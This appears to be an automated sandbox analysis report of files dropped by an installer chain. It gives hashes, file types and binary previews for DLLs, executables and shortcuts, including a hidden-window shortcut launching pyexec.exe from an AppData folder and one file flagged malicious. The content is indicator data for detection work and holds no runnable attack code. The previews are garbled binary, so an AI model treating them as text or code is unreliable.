                                                                                                                                                                                            SHA-512:7F20CC88FCC114A8640BBF106F8209AC4562A0EA275FAE6EA09CC7C88E7CF8244D21A6087C56CB0F86A1EDBB374E357B790A9E409522CBB38B83BDAD0BB65265
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:..bbl.s...C.OQ.Ru..V.OL...n.xYF..k.na..U...\..Y...t..S_...My...To..NA.J...]I..u^.]Ysc.BPr...H`....r.wL.Sy...uYAs.IGMfW...s..N..yy.L...B.UoR.....K.n..sA.ET...oppbFP.Ph....B..mrI..R..d..p.vdy.t.xl..].h...Y.f.^ed..o......bK..Tqw.rF.a.numP.P.d..[.U..q.`RsTj.....j.R...U.qf`._.PnO.g..k[......`...Qj.SP..nQ...b[CPLc...PE..G.I..\.S...QXG.J.oHUp.Zj.DL.O.como..oIuv...n..m...Bd..Xcb...y.N\w_.g..s..bK..^.T..k...t...T.[n.e..FpD.X.b....XD.m.xYD..E...WC..En^.ln..pd.RCi\ndMP.J..H..k.SSft.nr...dRjvT..vH.vy.snj.T.OSpH.Mn.`..U.[q.\j.a...G.J._..V....N]U.kWsJ..dB..^....ZLtAC.V..qYZD..WjaXhCV.EjY...li..d]s..I.Ds..IyUrcJ..XMi..H_...p.f.xN..AZ.EYed]AWgfC.a...WYh..t...aD.tT.VOWkHch.fn..TEM..N..YMA...ME....ISJR^j..C`y..Iua..j.sY.r....L.rj..T.dyFa.hCD...h.f..c.C.C....qMp...t[.q..g..Oam..K..].JW..r\S..V`_.b.]Po...`.EN.O.d...\.A.[.rMa.W.b.mGD..GDcb........MED^..S..Ey.FcQe.O..mI...\...yx..v...Qhr..Z.Lk.gn.S._e\VN...gA.J\P...l..Y.Dj....m..A_..MXl.H.F.......bW..I.c.ASNR.Q..^v.O.hH....Wbc....aU..n..q.A...`.n[X...p..P..
                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):22570
                                                                                                                                                                                            Entropy (8bit):5.339220305698995
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:5Y2p26eG9CtHs5NU8+uw724entQq+J/779pI0cdZWT4He9KKO9VGi5E:5Y2A6eqsHs5NU8z4enp+JT7Hl8bGuE
                                                                                                                                                                                            MD5:9078F84220E8B7379BFA2F4333995BC1
                                                                                                                                                                                            SHA1:21F0CBEFFDCD99BCE6521AADEAD7AA6F68EDD666
                                                                                                                                                                                            SHA-256:B7C4FEC4464E43A5736BF764F137F9AEE03C7E0D67755D964AB74854BC725F8F
                                                                                                                                                                                            SHA-512:45DD6188E3085D34E632091068F9D7C31D22E2643A20FB1A01C1C255F593E71FA2AEB34FD85D22DFACFBBDF7A1D69750206745215EE77D01A759ADA9849BE090
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:[.R..jx.GRhK.`.HgI.g.....Z...m...D......A.........mI..O.Rg..\s.....oNc.C..gr^vn.iVIy.B....TZ..g.WATY.F....v...H.....`....p..fP..OM.R..v.HDqs.....V..C...c..R.oE..xS\....`v..Ou.LkS..H.RL.UqNP.._d...f.gI]Qr....E..s..VA..A...w.UJ.\.IC.G..a.^.fPK....hbNaq.cq..[gP.QR..Vj.dSr....iX.x.aN.xk.m.V.O..`a.OEH\.Xy..oA.b.G..l..]Dh^o..i..l.RLRP.jaIpi..Q..Xv.I..GYpd.fd.....t.T..Y.n.H..v..X^.....d.d.nPy..Yk..ee.KKjS`J.m^.A...e.X...irv...J`..jyMLTn.H]Jn...FnxMp.Gg[.C.Y......KYU.XO.......TR^l\e....vvE..a.AGbJo..J.IJZGari...[R..ORhPP....LnM.Xd.n.Eo....qMgWOg..eL...U..SI.ff.hiZ.....pAUfw..IU.P...J..D..PD.W.lPD..Vq.\.Sm...Q.G.wdvuoNQ_.O\..d...`.....[.r.....L....AN\.l.mp.Ifoic.....[eBDmpk.P.......F.Gp...ST.....pUu.x...O..pn.J...oEqD.f.B.yItPao...CvL.hVk.`....X.gR.I.rb..k.hGpxI...daQyL.o.k..xO.SL.hc.a.G_wbV....bk....EV`.sOmMN...K..CqglZ...YPigWRO.q..L.NUw...q[...pVF..l.[j.Pm...j\..w._NAk.O..ec[`q.jI.X.wu.u...Z...k.g`.N.ZoC.t.M.a.w..k...g.su.WiT.c.m...o..MHr...k.LDE`..BxQ..WgY.p...........hJ.s^.tmFPYU..y.[.B.io
                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):653952
                                                                                                                                                                                            Entropy (8bit):6.885961951552677
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:5hr4UC+Ju/A0BI4yWkoGKJwZ9axKmhYTMAO7wFKjCUmRyyPe:9JfyZFGKJjxKmhSMAB6CUmRyyPe
                                                                                                                                                                                            MD5:11D49148A302DE4104DED6A92B78B0ED
                                                                                                                                                                                            SHA1:FD58A091B39ED52611ADE20A782EF58AC33012AF
                                                                                                                                                                                            SHA-256:CEB0947D898BC2A55A50F092F5ED3F7BE64AC1CD4661022EEFD3EDD4029213B0
                                                                                                                                                                                            SHA-512:FDC43B3EE38F7BEB2375C953A29DB8BCF66B73B78CCC04B147E26108F3B650C0A431B276853BB8E08167D34A8CC9C6B7918DAEF9EBC0A4833B1534C5AFAC75E4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................6.........!.R...7.....&.....0.....6.....3...Rich..........PE..L.....i[...........!.....\..........@-.......p....Rx.........................0......?T....@..............................|..P...(................................3......................................@............................................text...t[.......\.................. ..`.data....g...p...D...`..............@....rsrc...............................@..@.reloc...7.......8..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):29152
                                                                                                                                                                                            Entropy (8bit):6.656857622778623
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:+yq82Ud7/zfkn8I+ilpd4TILqIgXYoBCH/3hprl:Zq824LfMV4TqqIgXYoBCH/3hpB
                                                                                                                                                                                            MD5:B6F6C3C38568EE26F1AC70411A822405
                                                                                                                                                                                            SHA1:5B94D0ADAC4DF2D7179C378750C4E3417231125F
                                                                                                                                                                                            SHA-256:A73454C7FAD23A80A3F6540AFDB64FC334980A11402569F1986AA39995AE496D
                                                                                                                                                                                            SHA-512:5C0A5E9A623A942AFF9D58D6E7A23B7D2BBA6A4155824AA8BB94DBD069A8C15C00DF48F12224622EFCD5042B6847C8FB476C43390E9E576C42EFC22E3C02A122
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=...=...=....`.?...#.e.?...#.c.<...#.r.?.......8...=...f...#.u.$...#.b.<...#.g.<...Rich=...................PE..L......I................."...(......a,.......@....@..................................u......................................lB..P....p..@............N...#...........................................A..@............@..x............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data........P.......0..............@....rsrc...@....p.......<..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2649600
                                                                                                                                                                                            Entropy (8bit):6.721887906506716
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:od0krhjbVYU9U/ElyrLKlvGBO58GBjy9nYM6JBe4PjnhMsQHNClhIdYTf2O+yX3g:xkrRyylvGB65cNCMghMtHIledkp7j
                                                                                                                                                                                            MD5:22AC09892F3706C6660D1FFE3387C07A
                                                                                                                                                                                            SHA1:06E0F1EA9958B338598D0B1378918E4EFCA773B8
                                                                                                                                                                                            SHA-256:2E158DFBCF37E16D4B0D73D59F5D583A733A12C7CFED243A76B2DE2FC9DEFBF7
                                                                                                                                                                                            SHA-512:4E40E904E680FD861BBB782C4B790C3B290E612E8FC196AB520B1AB7DE53E696DF316D45968F744DDF218CE04CA06AE2AE1CBF8B6B8CAB9C04C980CA32BEFEB0
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Bu....{...{...{..[...{..l...{..l....{..l....{..l...{...z.<.{..l..{..l...{..l...{..l...{.Rich..{.................PE..L...x..^...........!.........................................................).....\g)...@..........................g!..|...Q!.x....@(. ....................P(.2\.. ................................O!.@............................................text...z........................... ..`.rdata...D.......F..................@..@.data...pC....!..(....!.............@....rsrc... ....@(.......&.............@..@.reloc..~f...P(..h....'.............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):16004
                                                                                                                                                                                            Entropy (8bit):5.480444787413941
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:a8ijrF2MuSY/UuFpvPV6X5qaahBtpfU4o1x5aiTicxA4NzNra2SbC:7wroMK/5FJEX5qaEPZ4umAuSbC
                                                                                                                                                                                            MD5:DD9E90F7ED3D000C00A3DFFFCEF973AC
                                                                                                                                                                                            SHA1:01A20DBE36E7354A50CA3B770D42115451BD01B4
                                                                                                                                                                                            SHA-256:49F57A37AB5DEB2F3C9085A57F64432EAFDC8C5A8EB0AED860C42A58D1E5FB80
                                                                                                                                                                                            SHA-512:1C63535F6C54506D641E7847F61D68B39FA3D64EEF36A0DC951F19A44F02DD68FD0140769FFDCCD5B227101D8A645F1A20A064579B94AF6700811791848ECAB7
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:@...e...........@....................................@..........H...............o..b~.D.poM...B..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.............System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.6.....%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):5607481
                                                                                                                                                                                            Entropy (8bit):7.741230161674235
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:98304:pY/Mc74CCf5aZkGdipdQoEm+HmOXSLs0+bCfq:uEcDa5ak9QqGbXSR+br
                                                                                                                                                                                            MD5:4CC822DCC3C57B2B0C272321E16CE64A
                                                                                                                                                                                            SHA1:042C1317BD2F4369029254F61627A3C9016F34C7
                                                                                                                                                                                            SHA-256:89BB1DDB1768C503644F5BEFDF5C2BEDB5B056E1A06842ADD8424D87FDC97933
                                                                                                                                                                                            SHA-512:82BE4B3AD6F1B4DC8662B49AA479E269EE75CD1465094C2673C8D803FF7CE47B4BD13960DB698970F3A9476D5741C54C747B0C508E964F6080E27634F2D3A38C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:H..vJ..vK..vK..vJ..vo..v_..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vn..&...7n...(...$..*....$..*....?...%..&9...*..*....?..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..v...."...'.....vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..v............*...K..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vn..8...S....9...-.8...09...<...K..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..v=..Fe..Ay..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..v
                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):5607481
                                                                                                                                                                                            Entropy (8bit):7.74123053089545
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:98304:BY/Mc74CCf5aZkGdipdQoEm+HmOXSLs0+bCfq:GEcDa5ak9QqGbXSR+br
                                                                                                                                                                                            MD5:8879A085D944972D5E93B10E87DDAE0F
                                                                                                                                                                                            SHA1:900E3FC08B8F7594A57DA6ECF1DED26A486D068A
                                                                                                                                                                                            SHA-256:1D8DFC38826F2F779F2998B05860314A9A94D40E8B0E580773D6761B28155AD1
                                                                                                                                                                                            SHA-512:59407BA62FAA1F64D1C563ABD1F8488D4DA8FF1BD5BEB4E298084F45F89F2EFB5E0B58C2677F80029E04BE70D81C21B83D0C1A014C5D8DD2B205145A1F4F1F80
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:H..vJ..vK..vK..vJ..vo..v_..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vn..&...7n...(...$..*....$..*....?...%..&9...*..*....?..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..v...."...'.....vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..v............*...K..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vn..8...S....9...-.8...09...<...K..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..v=..Fe..Ay..vK..vK..vK..vK..vK..vK..vK..vK..vK..vK..v
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Nov 18 19:01:29 2024, mtime=Mon Nov 18 19:01:43 2024, atime=Sat Nov 16 10:22:00 2024, length=29152, window=hide
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):883
                                                                                                                                                                                            Entropy (8bit):4.993257570939601
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:8XE6a4OTNVTI8CcWaY//6/DeSLG/KmJmOAKCjAHl8cHX+OJ+VRdwdimV:8X/OTNVk8SZSDestmR+AH2O6RS8m
                                                                                                                                                                                            MD5:AF71255CB83E0D3300B918B031B85C49
                                                                                                                                                                                            SHA1:F5A8FA1532720B3A0557F08B4B676DC8418CE21E
                                                                                                                                                                                            SHA-256:4418AE2C04C81892E6517257CCF64F6A71FCFADBE9C9B8E6677683E2B50C0B99
                                                                                                                                                                                            SHA-512:47BE0DB610236A9AD6B75236F74BBF42C5A20F671DE975EDEB3E4E73FD293945E9441973E69877A75CBD352B341D2A305A14B172C485664EC128A43C975FE9AF
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:L..................F.... ...xBj..9.....9...<...8...q........................:..DG..Yr?.D..U..k0.&...&.........{4......m.9....W..9......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.HrYu...............................A.p.p.D.a.t.a...B.V.1.....rY/...Roaming.@......FW.HrY0..........................."H&.R.o.a.m.i.n.g.....^.1.....rY/...SERVIC~1..F......rY/.rY0...........................[\..S.e.r.v.i.c.e.A.l.t.....`.2..q..pY.Z .pyexec.exe..F......rY/.rY/...............................p.y.e.x.e.c...e.x.e.......b...............-.......a...........+........C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exe..#.....\.....\.R.o.a.m.i.n.g.\.S.e.r.v.i.c.e.A.l.t.\.p.y.e.x.e.c...e.x.e.`.......X.......210395...........hT..CrF.f4... ..............%..hT..CrF.f4... ..............%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2510336
                                                                                                                                                                                            Entropy (8bit):6.70544216784121
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:9SMkyb0lMgj5dOnerK6EmUGOpBTDNReDAhGqu8KC2hOFJDuK0XRJIsjhxsPWgsGt:MtaM0GNS5
                                                                                                                                                                                            MD5:D99578232A59360A1D35EFD5C3262055
                                                                                                                                                                                            SHA1:D9A5C1DD2A8293544EBF34272337F883B2E31EBF
                                                                                                                                                                                            SHA-256:22C778A42F7165DB320AC040C63DD5E97E4C191130E030E208E04B0B2C5F762B
                                                                                                                                                                                            SHA-512:84AB45699CE66B647D99F909C9C17A3BF8C5A7F61EF71996F08F49141512A16FAF124F48E7BEB371E684B6EF5C9154FE9048BA6859E79839B86AEB88D81FCA0A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:........................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...a.._..................#..:&..b..W..........@.............................0-.....5]&...`... ...............................................,.......-.8.....%..i............-.............................`.%.(...................X.,..............................text...(.#.......#.................`..`.data.........$.......#.............@....rdata..h.....$.......$.............@..@.pdata...i....%..j...r%.............@..@.xdata...Q....&..R....%.............@..@.bss.... a...`&..........................idata........,.......&.............@....CRT....0.....,......4&.............@....tls..........,......6&.............@....rsrc...8.....-......8&.............@..@.reloc........-......:&.............@..Bxqv.......... -......>&.............@...................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):6220
                                                                                                                                                                                            Entropy (8bit):3.71306090320916
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:xU8oFC1bHKkvhkvCCtWXnOtbxHBXnOt3H44:xRow7mWXnqXnn4
                                                                                                                                                                                            MD5:F0882571320A495D679B6116D5D2D85C
                                                                                                                                                                                            SHA1:14587837A1F94E168714F5D29AD3152233774195
                                                                                                                                                                                            SHA-256:4BE9558AFFDB875164D5972CD93BD8A6F88E0DAC945A61F5921BC83C51178396
                                                                                                                                                                                            SHA-512:3717592AE12349F1C9BE9D957638037BFD723F0BAF35A1FE4B17BA1832B4AA83CE6A5A6868D551095EB5FAE42C63C3EBE8B30BC663CF02B53150830991872E7B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:...................................FL..................F.".. ......{4.......9..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........{4......m.9.......9......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.HrYu...............................A.p.p.D.a.t.a...B.V.1.....rYz...Roaming.@......FW.HrYz...........................o.L.R.o.a.m.i.n.g.....\.1.....rYw...MICROS~1..D......FW.HrY............................{...M.i.c.r.o.s.o.f.t.....V.1.....GX*w..Windows.@......FW.HrYu............................XN.W.i.n.d.o.w.s.......1.....FW.H..STARTM~1..n......FW.HrYu.....................D.....R=..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....rY....Programs..j......FW.HrY......................@.....$...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FW.HrY............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FW.HrY'.....Q...........
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):6220
                                                                                                                                                                                            Entropy (8bit):3.71306090320916
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:xU8oFC1bHKkvhkvCCtWXnOtbxHBXnOt3H44:xRow7mWXnqXnn4
                                                                                                                                                                                            MD5:F0882571320A495D679B6116D5D2D85C
                                                                                                                                                                                            SHA1:14587837A1F94E168714F5D29AD3152233774195
                                                                                                                                                                                            SHA-256:4BE9558AFFDB875164D5972CD93BD8A6F88E0DAC945A61F5921BC83C51178396
                                                                                                                                                                                            SHA-512:3717592AE12349F1C9BE9D957638037BFD723F0BAF35A1FE4B17BA1832B4AA83CE6A5A6868D551095EB5FAE42C63C3EBE8B30BC663CF02B53150830991872E7B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:...................................FL..................F.".. ......{4.......9..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........{4......m.9.......9......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.HrYu...............................A.p.p.D.a.t.a...B.V.1.....rYz...Roaming.@......FW.HrYz...........................o.L.R.o.a.m.i.n.g.....\.1.....rYw...MICROS~1..D......FW.HrY............................{...M.i.c.r.o.s.o.f.t.....V.1.....GX*w..Windows.@......FW.HrYu............................XN.W.i.n.d.o.w.s.......1.....FW.H..STARTM~1..n......FW.HrYu.....................D.....R=..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....rY....Programs..j......FW.HrY......................@.....$...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FW.HrY............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FW.HrY'.....Q...........
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 19:00:00 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2673
                                                                                                                                                                                            Entropy (8bit):3.9788161407211704
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:8dpdqLTKzIaAHOidAKZdA1FehwiZUklqehly+3:8gLW8ahuy
                                                                                                                                                                                            MD5:C67000ADAD8F1CA61D4FEB3BCE454ED9
                                                                                                                                                                                            SHA1:853DC2E0EF3F4CA149CEBC2D4ECD8D97D6822DC8
                                                                                                                                                                                            SHA-256:FD473FF6A0A4F168A5EFDD02BDCD6D12DE0DE9CFBA434D6AAFBF36331AB70980
                                                                                                                                                                                            SHA-512:BE141F0869B39410A9775995908338A45E2DFC7E2BCA219E2EECD860A0E4D6CB81E0701707757865A2CA25811E92A31C14CC0DA4B1E090492CD0D8B832157565
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,....@$as.9..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IrYu.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY}.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VrY}.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VrY}............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VrY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........+........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 19:00:00 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2675
                                                                                                                                                                                            Entropy (8bit):3.996554261900416
                                                                                                                                                                                            Encrypted:false
